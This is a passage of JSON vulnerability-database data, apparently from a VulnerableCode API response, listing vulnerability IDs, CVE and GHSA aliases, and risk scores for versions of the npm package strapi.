"VCID-mffu-ck9j-vkg8" }, { "vulnerability": "VCID-n7t6-zk51-afc3" }, { "vulnerability": "VCID-qcu6-ntuc-byea" }, { "vulnerability": "VCID-v79g-np4c-kygh" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/strapi@3.2.5" } ], "aliases": [ "CVE-2020-27666", "GHSA-qvp5-mm7v-4f36" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-yafu-6e7s-y3cw" } ], "fixing_vulnerabilities": [], "risk_score": "4.5", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/strapi@3.0.0-beta.20.3" }